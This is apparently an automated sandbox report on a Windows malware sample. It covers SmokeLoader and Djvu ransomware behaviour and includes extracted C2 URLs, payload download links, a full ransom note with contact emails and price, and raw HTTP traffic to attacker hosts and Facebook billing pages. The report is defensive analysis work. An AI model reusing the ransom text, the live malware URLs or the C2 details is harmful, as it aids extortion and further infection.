Windows Analysis Report
file.exe

AV Detection

Source: http://185.174.137.174/s.exe

Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\8C19.exe

Avira: detection malicious, Label: HEUR/AGEN.1210630

Source: file.exe	Virustotal: Detection: 38%			Perma Link
Source: file.exe	ReversingLabs: Detection: 43%

Source: jamesmillion.xyz	Virustotal: Detection: 12%			Perma Link
Source: avtlsgosecure.com	Virustotal: Detection: 10%			Perma Link

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\8C19.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6246.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\69A9.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\837D.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4316.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7795.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7AF0.exe	Joe Sandbox ML: detected

Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}

Source: 8.0.6246.exe.400000.6.unpack

Malware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-o7UXxOstmw\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0585Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\

Compliance

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49718 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
Source:	Binary string: \C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
Source:	Binary string: C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb source: 6246.exe, 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
Source:	Binary string: C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
Source:	Binary string: M"C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: aa C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb6K source: 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
Source:	Binary string: C:\xifibezevatem\nebopo.pdb source: 7795.exe, 00000007.00000000.474481270.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 837D.exe, 00000009.00000000.476307271.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 837D.exe.1.dr, 7795.exe.1.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\6246.exe

Code function: 4_2_00404AE9 SetLastError,GetTickCount,GetLogicalDriveStringsW,LocalAlloc,UnregisterWait,GetNamedPipeHandleStateW,InterlockedIncrement,GetPrivateProfileStructA,GetConsoleAliasExesLengthW,EnumCalendarInfoA,EnumDateFormatsW,InterlockedCompareExchange,DeleteFiber,GetPrivateProfileStructA,LeaveCriticalSection,InterlockedExchange,RtlCaptureContext,FindResourceA,LocalFlags,OpenMutexA,GetStringTypeExA,GetComputerNameA,InitializeCriticalSection,LoadLibraryW,GetModuleHandleA,GetProcAddress,InterlockedDecrement,InterlockedDecrement,GetCurrentConsoleFont,GlobalFlags,FindNextVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageW,CreateActCtxA,GetConsoleTitleA,GetCalendarInfoA,VerifyVersionInfoW,FindFirstChangeNotificationA,InterlockedIncrement,InterlockedDecrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetProfileSectionA,MoveFileWithProgressA,GetCommandLineW,WriteConsoleA,lstrcpynW,CopyFileA,LoadLibraryA,MoveFileWithProgressW,CreateIoCompletionPort,GetOEMCP,InterlockedExchange,GetPrivateProfileStructA,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,GetFileTime,GetStringTypeW,

4_2_00404AE9

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\			Jump to behavior

Networking

Source: C:\Windows\explorer.exe	Domain query: github.com
Source: C:\Windows\explorer.exe	Domain query: dldsystem.com
Source: C:\Windows\explorer.exe	Domain query: furubujjul.net
Source: C:\Windows\explorer.exe	Domain query: pelegisr.com
Source: C:\Windows\explorer.exe	Domain query: avtlsgosecure.com
Source: C:\Windows\explorer.exe	Network Connect: 185.174.137.174 80			Jump to behavior

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49692 -> 104.21.93.30:80
Source: Traffic	Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49693 -> 185.174.137.174:80
Source: Traffic	Snort IDS: 2851115 ETPRO TROJAN Win32/Fabookie.ek CnC Activity M2 192.168.2.5:49702 -> 45.136.151.102:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49705 -> 34.91.216.49:80

Source:

DNS query: jamesmillion.xyz

Source: Malware configuration extractor	URLs: http://winnlinne.com/lancer/get.php
Source: Malware configuration extractor	URLs: http://liubertiyyyul.net/
Source: Malware configuration extractor	URLs: http://bururutu44org.org/
Source: Malware configuration extractor	URLs: http://youyouumenia5.org/
Source: Malware configuration extractor	URLs: http://nvulukuluir.net/
Source: Malware configuration extractor	URLs: http://nuluitnulo.me/
Source: Malware configuration extractor	URLs: http://guluiiiimnstra.net/

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 17 Oct 2022 20:06:30 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 17 Oct 2022 19:59:09 GMTETag: "36200-5eb4068a369dc"Accept-Ranges: bytesContent-Length: 221696Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db a3 54 76 9f c2 3a 25 9f c2 3a 25 9f c2 3a 25 81 90 af 25 88 c2 3a 25 81 90 b9 25 e0 c2 3a 25 b8 04 41 25 9c c2 3a 25 9f c2 3b 25 0e c2 3a 25 81 90 be 25 a9 c2 3a 25 81 90 ae 25 9e c2 3a 25 81 90 ab 25 9e c2 3a 25 52 69 63 68 9f c2 3a 25 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a 51 4b 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 01 00 00 58 17 00 00 00 00 00 06 a1 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 19 00 00 04 00 00 3c 0b 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f3 01 00 28 00 00 00 00 e0 18 00 d8 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 39 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 1c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 ef 01 00 00 10 00 00 00 f0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 dc 16 00 00 00 02 00 00 22 01 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 4b 00 00 00 e0 18 00 00 4c 00 00 00 16 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic	HTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dldsystem.com
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dldsystem.com
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmedenoe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ariymxinp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://okrenbrpq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: furubujjul.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gvuhujihq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: furubujjul.net
